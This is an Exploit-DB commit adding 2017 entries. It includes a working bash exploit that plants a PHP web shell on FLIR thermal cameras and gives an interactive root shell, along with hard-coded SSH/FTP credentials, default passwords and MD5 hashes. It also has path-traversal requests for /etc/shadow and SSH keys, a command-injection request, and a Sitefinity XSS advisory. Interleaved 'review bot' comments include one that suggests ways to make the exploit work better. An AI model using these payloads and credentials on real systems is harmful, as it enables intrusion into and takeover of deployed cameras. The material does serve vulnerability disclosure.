DB: 2017-09-27

8 new exploits

Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)
Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor
NodeJS Debugger - Command Injection (Metasploit)

Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
FLIR Thermal Camera F/FC/PT/D - Information Disclosure
FLIR Thermal Camera FC-S/PT - Command Injection
FLIR Thermal Camera F/FC/PT/D - Stream Disclosure
Sitefinity CMS 9.2 - Cross-Site Scripting
Offensive Security 2017-09-27 05:01:31 +00:00
parent f27338c1f7
commit a06626c22f
9 changed files with 886 additions and 1 deletions


@ -15731,7 +15731,7 @@ id,file,description,date,author,platform,type,port
42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001
42779,platforms/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,linux,remote,9001
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@ -15852,6 +15852,8 @@ id,file,description,date,author,platform,type,port
42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16500,6 +16502,7 @@ id,file,description,date,author,platform,type,port
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38557,3 +38560,8 @@ id,file,description,date,author,platform,type,port
42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection",2017-09-22,8bitsec,php,webapps,0
42775,platforms/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps,0
42776,platforms/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps,0
42785,platforms/hardware/webapps/42785.sh,"FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution",2017-09-25,LiquidWorm,hardware,webapps,0
42786,platforms/hardware/webapps/42786.txt,"FLIR Thermal Camera F/FC/PT/D - Information Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0
42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0
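Review bot: The two 42779 rows in the first hunk differ only in the version wording, and the `3.0a1 < 3.3.2` form excludes 3.3.2 while `3.0a1 - 3.3.2` includes it; if 3.3.2 is itself affected (the Metasploit module's version range is not visible in this commit), the retained `<` wording drops a vulnerable release from the index. Either keep the inclusive form or write `Supervisor 3.0a1 <= 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)` so searches on the last affected version still match. The remaining hunks only append rows for the new files, and their ids, paths and dates agree with the files added below.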


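--- /dev/null
+++ b/platforms/asp/webapps/42792.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Stored Cross Site Scripting (XSS) in Progress Sitefinity CMS 9.2
+# Date: Aug 31, 2017
+# Exploit Author: Pralhad Chaskar
+# Vendor Homepage: http://www.sitefinity.com/
+# Tested on: Progress Sitefinity CMS 9.2 and lower
+# CVE : NA
+Vendor Description
+------------------
+Progress® Sitefinity™ is a content management and marketing analytics platform designed to maximize the agility needed to succeed in todays rapidly changing digital marketplace. It provides developers and IT teams the tools they need to support enterprise-level digital marketing, optimizing the customer journey by delivering seamless personalized experiences across different technologies and devices. Progress is a trusted source for the digital marketing innovation needed to create transformative customer experiences that fuel business success.
+Description
+------------
+Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
+Vulnerability Class
+--------------------
+Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
+Proof of Concept
+----------------
+Below mentioned input fields aren't properly escaped. This could lead to an XSS attack that could possibly affect administrators, users, editor.
+http://xx.sitefinity.com/Sitefinity/Pages
+Parameter : Page Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/News
+Parameter : News Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/List
+Parameter : List Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/Documents/LibraryDocuments/incident-request-attachments
+Parameter : Document Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/Images/LibraryImages/newsimages
+Parameter : Image Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/links
+Parameter : Link Title
+Method: POST
+http://xx.sitefinity.com/Sitefinity/Content/Videos/LibraryVideos/default-video-library
+Parameter : Video Title
+Method: POST
+Vendor Contact Timeline
+------------------------
+Discovered: October 16, 2016
+Vendor Notification: October 18, 2016
+Advisory Publication: Aug 31, 2017
+Public Disclosure: Aug 31, 2017
+Affected Targets
+----------------
+Sitefinity CMS 9.2 and lower
+Solution
+--------
+Upgrade to Sitefinity CMS 10.1 to fix this issue.
+Credits
+-------
+Pralhad Chaskar
+Information Security Analyst
+Help AG Middle East
+References
+----------
+[1] Help AG Middle East http://www.helpag.com/
+[2] Sitefinity CMS Version Notes http://www.sitefinity.com/product/version-notes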
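Review bot: The advisory never states the precondition that all seven injection points are under `/Sitefinity/`, the administrative backend, which presumably requires a logged-in backend user; that belongs next to the proof of concept, e.g. `Requires an authenticated backend account able to create pages/content; the stored payload executes for any backend user who later opens the item, including administrators.` The affected range `9.2 and lower` and the fix `10.1` leave 10.0 unaddressed — say whether it is affected or why it was skipped. The title fields are listed without a sample payload or the page on which the unescaped value is rendered, which is what a reader needs to reproduce a stored XSS; one example such as `Page Title: <svg onload=alert(document.domain)>` plus the rendering location would suffice. `CVE : NA` reads as "not applicable" rather than "not assigned"; `CVE : none assigned` is clearer.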


@ -0,0 +1,54 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series-R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.
Desc: FLIR utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials are never exposed to the end-user and cannot be changed
through any normal operation of the camera.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5436
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5436.php
23.03.2017
--
root:indigo
root:video
default:video
default:[blank]
ftp:video
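Review bot: The credential list at the end does not say which service each pair was verified against or what access it grants, although that is the whole finding: the title says SSH, yet `ftp:video` and `default:[blank]` suggest FTP and a non-root login are also involved. Annotate each pair, e.g. `root:indigo   - SSH (port 22), root shell`, and state whether SSH and FTP listen by default on the affected firmware. Since the description says the accounts cannot be changed through normal operation, a mitigation line (restrict 22/21 to a management network, or name a fixed firmware version if one exists) would make the advisory actionable. The Summary paragraph describes the PT-Series only, while six product lines are listed as affected.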


@ -0,0 +1,101 @@
#!/bin/bash
#
#
# FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.flir.com
# Affected version: Firmware version: 8.0.0.64
# Software version: 10.0.2.43
# Release: 1.3.4 GA, 1.3.3 GA and 1.3.2
#
# Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
# bring thermal and visible-light imaging together in a system that gives you
# video and control over both IP and analog networks. The PT-Series' precision
# pan/tilt mechanism gives you accurate pointing control while providing fully
# programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
# PT-Series cameras define a new standard of performance with five models that
# provide full 640x480 thermal resolution.
#
# Desc: FLIR Camera PT-Series suffers from multiple unauthenticated remote command
# injection vulnerabilities. The vulnerability exist due to several POST parameters
# in controllerFlirSystem.php script when calling the execFlirSystem() function not
# being sanitized when using the shell_exec() PHP function while updating the network
# settings on the affected device. This allows the attacker to execute arbitrary system
# commands as the root user and bypass access controls in place.
#
# ========================================================
#
# bash-3.2$ ./flir0.sh 10.0.0.10 8088
#
# Probing target: http://10.0.0.10:8088
#
# Status: 200
# Target seems OK!
# You got shell!
# Ctrl+C to exit.
#
# [root@FLIR ~]# id;pwd;uname -a
# uid=0(root) gid=0(root)
# /var/www/data/maintenance
# Linux FLIR 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082 #1 Wed May 1 12:25:27 PDT 2013 armv5tejl unknown
# [root@FLIR ~]# ^C
# bash-3.2$
#
# ========================================================
#
# Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
# Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
# Nexus Server/2.5.29.0
# Nexus Server/2.5.14.0
# Nexus Server/2.5.13.0
# lighttpd/1.4.28
# PHP/5.4.7
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5438
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5438.php
#
#
# 23.03.2017
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
echo -e "Usage: $0 ipaddr port\\n"
exit 1
fi
ip=$1
port=$2
echo -e "\\nProbing target: http://$ip:$port\\n"
payload="dns%5Bdhcp%5D=%60echo+\"<?php+system(\\\\\$_GET['c']);?>\">test.php%60&dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D="
htcode=$(curl -Is -G http://"$ip":"$port"/maintenance/controllerFlirSystem.php -d"$payload" 2>/dev/null | head -1 | awk -F" " '{print $2}')
echo -ne "Status: "; echo "$htcode"
if [ "$htcode" == "200" ]; then
echo "Target seems OK!"
else
echo "Ajdee...something went wrong. Check your target."
exit 1
fi
echo -e "You got shell!\\nCtrl+C to exit.\\n"
while true; do
echo -ne "\\033[31m";
read -rp "[root@FLIR ~]# " cmd
echo -ne "\\033[00m";
shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}"
curl "$shell"
done
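Review bot: The script leaves a persistent, unauthenticated web shell on the camera: the injected command writes `test.php` into the PHP script's working directory (shown as `/var/www/data/maintenance` in the sample session) and nothing ever removes it, so any later visitor to `/maintenance/test.php?c=` gets root. Add a cleanup hook after `port=$2`, e.g. `trap 'curl -s "http://$ip:$port/maintenance/test.php?c=rm+test.php" >/dev/null' EXIT`, so Ctrl+C tears the shell down. The interactive loop only rewrites spaces (`${cmd// /+}`), so any command containing `&`, `#`, `%`, `+` or `;` is truncated or mangled by the query parser; `curl -sG --data-urlencode "c=$cmd" "http://$ip:$port/maintenance/test.php"` encodes it properly. Note also that the probe uses `curl -I -G`, i.e. a HEAD request with the parameters in the query string, while the header text describes POST parameters — worth stating that the script relies on the target accepting them either way, and that a 200 on the probe does not prove the file was written.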


@ -0,0 +1,373 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
provide full 640x480 thermal resolution.
Desc: Input passed thru several parameters is not properly verified before
being used to read files. This can be exploited by an unauthenticated attacker
to read arbitrary files from local resources.
==============================================================================
/var/www/data/controllers/api/xml.php:
--------------------------------------
68: private function readFile($file)
69: {
70: if (!empty($file) && file_exists($file)) {
71: $xml = file_get_contents($file);
72: $this->setVar('result', $xml);
73: $this->loadView('webservices/default');
74: }
75: else {
76: $this->loadPageNotFound();
77: }
78: }
==============================================================================
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5434
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5434.php
23.03.2017
--
Requests:
GET http://TARGET/api/xml?file=/var/www/data/modules/legacy/config.php HTTP/1.1
Output:
=====================================================================
<?php
$configFile = "config.ini";
// load configuration params
$config = parse_ini_file($configFile);
if (!$config || count($config) == 0 || !isset($config["dir_nexus"]))
die("error loading configuration file...");
// TODO if don't exist configuration, create config.ini according system and nexus setup
// global
define ("BASE", $config["dir_nexus"]);
define ("BIN", $config["dir_bin"]);
define ("TMP_DIR", $config["dir_tmp"]);
define ("SERVER_DIR", $config["dir_server"]);
define ("CONF_DIR", $config["dir_conf"]);
define ("WEB_DIR", "/web/");
define ("TOOLS_DIR", "/tools/");
define ("HARDWARE_DIR", "/hardware/");
define ("BACKUPS_DIR", "/backups/");
define ("BACKUPS_INI_DIR", BACKUPS_DIR . "ini_files/");
define ("BACKUPS_SYS_DIR", BACKUPS_DIR . "system_files/");
// server files
define ("INI_FILE", "/server/conf/server.ini");
define ("INI_DEFAULTS", "factory.defaults");
define ("LOG_FILE", "server.log");
define ("LOG_DEFAULT_PATH","/server/logs");
define ("SCANLIST_DEFAULT_PATH","/server/sl");
define ("LIC_FILE", "/server/license/license.txt");
define ("ZOOM_LUT_FILE", "/server/conf/zoom_lut.txt");
define ("DICTIONARY_FILE", "/server/conf/dictionary.txt");
define ("PELOC_D_FILE", "/server/conf/PelcoD.map");
define ("FIRMWARE_FILE", "firmware.sh");
define ("HARDWARE_FILE", BASE."/hardware/hardware.cfg");
// server ini
define ("INI_SECTION_DEVICES", "Devices");
define ("INI_SECTION_DEVICES_IDS", " Ids");
define ("INI_SECTION_DEVICES_INTERFACE", "INTERFACE");
define ("INI_SECTION_INTERFACE", INI_SECTION_DEVICES_INTERFACE . " Configuration - Device ");
// nexus cgi
define ("NEXUSCGI_DEFAULTPORT", 0);
define ("NEXUSCGI_TYPE", "Nexus CGI Interface");
// web
define ("USERS_FILE", "config/app/users.txt");
define ("WEBVERSION", "3.4.0.0");
define ("RECOMENDEDSERVERVERSION", "2.5.13.0");
// xml files
define ("devicesFOLDER","devices");
define ("configFOLDER","configuration");
define ("driversFOLDER","drivers");
// system
// TODO
define ("UNZIP","/usr/bin/unzip");
define ("ZIP","/usr/bin/zip");
define ("SUDO", $config["sudo"]);
define ("FLIRSYS", $config["flir_system"]);
define ("FLIRSTP", $config["flir_setup"]);
define ("CONFSRC", $config["config_source_dir"]);
define ("INISRC", $config["config_source_ini_dir"]);
define ("LOCK_FILE", "/server/conf/.locked");
// service
define ("START", SUDO . $config["service_start"]);
define ("STOP", SUDO . $config["service_stop"]);
define ("STATUS", SUDO . $config["service_status"]);
// server file
define ("SERVER_FILE", SERVER_DIR . "bin/" .$config["server_file"]);
define ("STARTUP_FILE", $config["startup_file"]);
define ("BOOT_FILE", $config["boot_file"]);
define ('LINE_FEED', "\n");
// help
define ("HELP_FILES", $config["help_files"]);
// Debug mode
define("DEBUG", $config["debug_mode"]);
?>
=====================================================================
Other file requests:
--------------------
http://TARGET/api/xml?file=/etc/passwd
http://TARGET/api/xml?file=/etc/shadow
http://TARGET/api/xml?file=/proc/version
http://TARGET/api/xml?file=/root/.ssh/authorized_keys
http://TARGET/api/xml?file=/var/www/lighttpd.conf
http://TARGET/api/xml?file=../../../../../../../../../etc/passwd
http://TARGET/api/file/download/etc/shadow
http://TARGET/api/file/download/etc/passwd
http://TARGET/api/file/content/etc/shadow
http://TARGET/api/file/content/var/log/messages
http://TARGET/api/server/videosnap?file=../../../../../../etc/passwd
http://TARGET/onvif/device_service
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/MessagingConfig.xml
http://TARGET/api/server/status/full
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/FC-334-NTSC.ini
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/scheduler.xml
http://TARGET/page/maintenance/view/server-lan
http://TARGET/api/xml?file=/tmp/SW_versions.txt
http://TARGET/api/xml?file=/usr/local/nexus/hardware/hardware.cfg
http://TARGET/api/file/ini/read
The clear.sh script:
--------------------
http://TARGET/api/xml?file=/var/www/data/config/app/clear.sh
Output:
=====================================================================
#!/bin/bash
########
# is web root
if [ ! -f "index.php" ]
then
echo "please, run from web root"
exit -1
fi
# delete old files with spaces
echo "deleting deprecated files (with spaces, ampersand and/or dots)"
find . -name "* *" -print0 | xargs -0 rm -f
echo
# files to delete (deprecated, old...)
FILES_TODETELE="webroot/images/models/
webroot/js/old/
FLIRish.php
footer.html.php
getCgiPort.php
global_functions.php
headerNavigation.php
index-login
isUserogged.php
log_users.php
mobile-loading.php
mobile-meta
testApifile.php
unauthorized.php
users.txt
wizard.php
api/
bundle/
conf/
config/app/clientdesc
config/app/update-files.sh
config/boot_settings.json
config/config.ini
flirfiles/
help/
js/
livevideo/
maintenance/
modules/legacy/
setup/
styles/
tmp/user_permissions.json
xmlfiles/
views/main/maintenance/files-extra.php
webroot/images/mobile/
webroot/images/livevideo/
webroot/images/advancedBottom.png
webroot/images/advancedMiddle.png
webroot/images/advancedTop.png
webroot/images/arrowUpMini.png
webroot/images/bgBottom.png
webroot/images/bgButton.png
webroot/images/bgButtonOn.png
webroot/images/bgFullBottom.png
webroot/images/bgFullMiddle.png
webroot/images/bgFullTop.png
webroot/images/bgMiddle.png
webroot/images/bgTop.png
webroot/images/bottomBar.png
webroot/images/flir.ico
webroot/images/leftMenuButton.png
webroot/images/_logoFlirMini
webroot/images/logoFlir.png
webroot/images/logoFlirMini.png
webroot/images/radio.png
webroot/images/tabBackground.png
webroot/css/flir.base.css
webroot/css/flir.ie.css
webroot/css/flir.maintenance.css
webroot/css/flir.mobile.css
webroot/css/flir.setup.css
webroot/css/flir.video.css
webroot/css/flir.wizard.css
webroot/css/jquery/jquery.jscrollpane.css
webroot/css/jquery/jquery-ui-1.8.7.custom.css
webroot/js/PIE_uncompressed.js
webroot/js/jquery/jquery-1.5.1.min.js
webroot/js/jquery/jquery-1.5.min.js
webroot/js/jquery/plugins/jquery.ba-dotimeout.js
webroot/js/jquery/plugins/jquery.dd.js
webroot/js/jquery/plugins/jquery.forms.js
webroot/js/jquery/plugins/jquery.i18n.properties-1.0.9.js
webroot/js/jquery/plugins/jquery.jscrollpane.js
webroot/js/jquery/plugins/jquery.mousewheel.js
webroot/js/jquery/plugins/jquery.touchable.js
webroot/js/jquery/plugins/jquery.touchable.js.orig
webroot/xml/host_types.xml
webroot/xml/devices/em
webroot/xml/devices/foveal
webroot/xml/devices/foveus/foveus_Foveus.xml
webroot/xml/devices/foveus/foveus_PTZ35x140.xml
webroot/xml/devices/foveus/foveus_Voyager.xml
webroot/xml/devices/geo/geo_Georeference.xml
webroot/xml/devices/gyro/gyro_TCM2.6.xml
webroot/xml/devices/i2c
webroot/xml/devices/interface/interface_Genetec.xml
webroot/xml/devices/interface/interface_ONVIF.xml
webroot/xml/devices/ir/ir_Microcore275Z.xml
webroot/xml/devices/ir/ir_Thermovision-2000.xml
webroot/xml/devices/ir/ir_Thermovision-3000.xml
webroot/xml/devices/onboard/onboard_LTC2990.xml
webroot/xml/devices/onboard/onboard_LTC2991.xml
webroot/xml/devices/osd/osd_BOB3.xml
webroot/xml/devices/pelco/pelco_PELCO_D.xml
webroot/xml/devices/pharos/pharos_Pharos.xml
webroot/xml/devices/plat/plat_Sagebrush.xml
webroot/xml/devices/plat/plat_Vehicle.xml
webroot/xml/devices/tass/tass_TASS.xml
webroot/xml/devices/video/video_Pleora.xml
webroot/xml/devices/visca/visca_VISCA.xml
webroot/xml/devices/thermostate
webroot/xml/devices/tvi"
# delete files
echo "clearing files"
for oldfile in $FILES_TODETELE
do
echo "deleting $oldfile"
rm -rf $oldfile
done
echo
######
exit 0
=====================================================================
Disclosing usernames and hashes:
--------------------------------
http://TARGET/api/xml?file=/var/www/data/config/app/users.txt
user=ee11cbb19052e40b07aac0ca060c23ee
expert=b9b83bad6bd2b4f7c40109304cf580e1
admin=15f9a55de61622e9c2a61ce72663dc08
production=c8348b2fb046ff758256b3a5eadb4a8c
calibration=11df08a6fb66c9ae4eab03ba7db123b0
ee11cbb19052e40b07aac0ca060c23ee MD5 : user
b9b83bad6bd2b4f7c40109304cf580e1 MD5 : expert
15f9a55de61622e9c2a61ce72663dc08 MD5 : fliradmin
c8348b2fb046ff758256b3a5eadb4a8c MD5 : flirproduction
11df08a6fb66c9ae4eab03ba7db123b0 MD5 : flircal
Default credentials:
user:user
expert:expert
admin:fliradmin
production:flirproduction
calibration:flircal
http://TARGET/api/xml?file=/usr/local/nexus/server/conf/admin.passwd
AeRMh9wBkCS9k
Product info:
-------------
http://TARGET/api/system/config/product
{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]}


@ -0,0 +1,60 @@
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
PT-Series (PT-334 200562)
Summary: Get the best image detail in challenging imaging environments with the
FLIR FC-Series S thermal network camera. The award-winning FC-Series S camera
sets the industry standard for high-quality thermal security cameras, ideal for
perimeter protection applications. The FC-Series S is capable of replacing multiple
visible cameras and any additional lighting and infrastructure needed to support
them.
Desc: FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary shell commands as the root user.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5437
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php
23.03.2017
--
PoC request (sleep 17):
POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: TARGET
Content-Length: 64
Accept: */*
Origin: http://TARGET
X-Requested-With: XMLHttpRequest
User-Agent: Testingus/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
Connection: close
dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60
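Review bot: The PoC gives the reader nothing to observe: with `sleep 17` in the `dns[server2]` value the only signal is a response delayed by roughly 17 seconds, and that expectation should be written next to the request, e.g. `Expected: response delayed ~17 s; an unaffected build answers immediately.` The title says "Authenticated" but the advisory never states which account level the `PHPSESSID` was obtained with (user, expert or admin) — given the default credentials documented for these devices in the companion information-disclosure advisory, that detail decides the real severity. By my count the body as printed is 65 bytes against `Content-Length: 64`; replaying the request verbatim would drop the closing backtick, so recompute the header or omit it. The same `dns[...]` parameters are exercised unauthenticated in the companion PT-Series exploit against `controllerFlirSystem.php`; a sentence on how the two endpoints relate would help readers triage.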


@ -0,0 +1,51 @@
FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure
Vendor: FLIR Systems, Inc.
Product web page: http://www.flir.com
Affected version: Firmware version: 8.0.0.64
Software version: 10.0.2.43
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
FC-Series S (FC-334-NTSC)
FC-Series ID
FC-Series-R
PT-Series (PT-334 200562)
D-Series
F-Series
Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
bring thermal and visible-light imaging together in a system that gives you
video and control over both IP and analog networks. The PT-Series' precision
pan/tilt mechanism gives you accurate pointing control while providing fully
programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
PT-Series cameras define a new standard of performance with five models that
